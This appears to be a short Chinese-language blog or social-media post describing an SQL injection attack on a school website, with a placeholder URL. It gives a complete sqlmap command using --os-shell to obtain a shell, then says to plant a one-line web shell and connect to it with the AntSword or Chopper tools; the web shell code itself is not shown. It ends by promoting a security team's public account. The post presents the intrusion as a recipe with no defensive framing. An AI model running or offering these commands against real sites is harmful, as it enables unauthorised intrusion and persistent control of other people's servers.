某学校网站存在SQL注入漏洞,可以利用sqlmap对齐进行SQL注入攻击,并获得webshell。
漏洞URL:
http://www.xxx.com/news1.php?id=1
执行攻击命令:
sqlmap -u "http://www.xxx.com/news1.php?id=1" -p id --current-db --os-shell
可以getshell,但是 sqlmap提供的命令行操作不方便,这时,我们可以尝试写入一句话木马:
写入成功后,用蚁剑或者菜刀连接:
想学习更多网络安全的知识,可以关注公众号“SCLM安全团队”。